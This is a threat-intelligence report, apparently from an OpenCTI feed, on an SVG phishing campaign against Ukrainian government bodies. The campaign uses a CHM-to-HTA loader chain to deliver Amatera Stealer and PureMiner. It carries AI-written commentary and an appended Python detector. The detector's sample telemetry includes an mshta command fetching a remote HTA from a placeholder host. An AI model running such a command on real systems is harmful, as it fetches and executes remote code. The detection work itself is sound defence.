SVG Phishing hits Ukraine with Amatera Stealer, PureMiner
NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY :
A phishing campaign targeting Ukrainian government entities uses malicious SVG files to initiate an infection chain. The attack begins with emails containing SVG attachments that redirect victims to a download site. A CHM file is then used to execute a remote HTA loader, which delivers two malware payloads: Amatera Stealer and PureMiner. Amatera Stealer harvests extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets. PureMiner collects hardware information and monitors system activity to deploy efficient CPU or GPU mining modules. The campaign demonstrates sophisticated techniques, including fileless malware delivery and the use of multiple stages to evade detection.
OPENCTI LABELS :
fileless, phishing, ukraine, chm, cryptomining, data theft, svg, pureminer, amatera stealer, countloader, hta loader
AI COMMENTARY :
1. The recently uncovered phishing campaign titled “SVG Phishing hits Ukraine with Amatera Stealer, PureMiner” targets Ukrainian government entities through a deceptive email vector that leverages seemingly innocuous SVG attachments. The malicious SVG files covertly redirect recipients to a fake download portal, which is the first step toward system compromise. By exploiting the widespread trust in standard graphics formats and combining it with a fileless approach, attackers aim to bypass conventional security controls while appearing benign to both end users and detection tools.
2. Once users follow the link embedded in the SVG attachments, they encounter a CHM (Compiled HTML Help) file masquerading as a benign document. This CHM payload executes an HTA Loader in memory, employing a fileless technique that keeps artifacts off the disk and evades signature-based defenses. The HTA Loader, also referred to by researchers as countloader, serves as the gatekeeper for subsequent malicious stages, demonstrating an advanced level of operational security and stealthiness in the infection chain.
3. Following successful execution of the HTA Loader, victims receive two distinct malware payloads: Amatera Stealer and PureMiner. Amatera Stealer focuses on extensive data theft by harvesting credentials, system metadata, application data, browser files, and even cryptocurrency wallet information. Its comprehensive scope of data exfiltration poses a severe risk to both personal and institutional privacy, especially for government agencies handling sensitive information.
4. In parallel, PureMiner brings cryptomining capabilities to the infection, collecting hardware specifications and monitoring system performance to deploy optimized mining modules. By dynamically determining whether to use CPU or GPU resources, PureMiner maximizes mining efficiency while minimizing its footprint, prolonging its presence on compromised machines. This dual-threat model combining data theft with cryptomining amplifies the campaign’s ROI for threat actors and complicates remediation efforts.
5. The campaign’s reliance on sophisticated fileless execution, multi-stage loaders, and the dual deployment of Amatera Stealer and PureMiner highlights a growing trend in advanced phishing operations. The use of SVG attachments as the initial lure, combined with CHM-based HTA loaders, underscores attackers’ willingness to adopt unconventional formats to sidestep standard email defenses. This strategy demands enhanced monitoring of script-based processes in memory and a reevaluation of security policies around legacy file types and help documents.
6. To mitigate these threats, organizations, particularly those within Ukraine’s public sector, should enforce strict email attachment controls, deploy behavioral analysis tools capable of identifying fileless execution, and conduct regular threat hunting exercises focused on in-memory loaders such as countloader and HTA components. Endpoint detection solutions must be tuned to flag unauthorized HTA and CHM executions, and user awareness programs should stress the dangers of opening unsolicited attachments with uncommon file extensions.
7. In conclusion, the “SVG Phishing hits Ukraine with Amatera Stealer, PureMiner” campaign exemplifies an evolving threat landscape in which fileless methodologies and multi-stage deployment converge to deliver data theft and cryptomining operations. By understanding each phase, from the malicious SVG lure to the final PureMiner installation, security teams can strengthen defenses against this and future phishing threats of similar sophistication.
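The HTA and CHM execution monitoring recommended in paragraph 6 can be prototyped over process-creation telemetry. The following Python is an added example, not code from the report or from OpenCTI: the events are constructed, the field names are an assumption modelled on Sysmon Event ID 1 / EDR process-creation records, and the URL is an obvious placeholder.

```python
"""Flag the CHM -> HTA loader step in process-creation telemetry.

Added example; field names are an assumption modelled on Sysmon/EDR
process-creation records, and every event below is constructed.
"""
import re

# Constructed telemetry: a benign help-file open, the CHM-launched remote
# HTA loader described in the report, a local HTA run, and a benign process.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\hh.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\hh.exe" C:\Users\u\Documents\manual.chm'},
    {"pid": 4188, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\hh.exe",
     "cmdline": "mshta.exe http://EXAMPLE-PLACEHOLDER.invalid/loader.hta"},
    {"pid": 4201, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Users\u\AppData\Local\Temp\readme.hta"},
    {"pid": 4300, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_HOSTS = {"hh.exe", "mshta.exe"}   # CHM viewer and HTA host binaries


def basename(path):
    """Case-folded file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names an event matches, most generic first."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    hits = []
    if image in SCRIPT_HOSTS:
        hits.append("hta_or_chm_execution")   # informational: compare to allow-list
    if image == "mshta.exe" and parent == "hh.exe":
        hits.append("chm_spawns_hta")         # the CHM -> HTA loader step
    if image == "mshta.exe" and REMOTE_URL.search(event["cmdline"]):
        hits.append("mshta_remote_hta")       # HTA pulled from a web server
    return hits


def scan(events):
    """Map pid -> matched rules for every event that matched at least one."""
    results = {e["pid"]: classify(e) for e in events}
    return {pid: rules for pid, rules in results.items() if rules}
```

Only the hh.exe-parented, URL-bearing mshta.exe event triggers both high-signal rules; the other two hits are informational and are where an allow-list of sanctioned help files and HTAs would be applied.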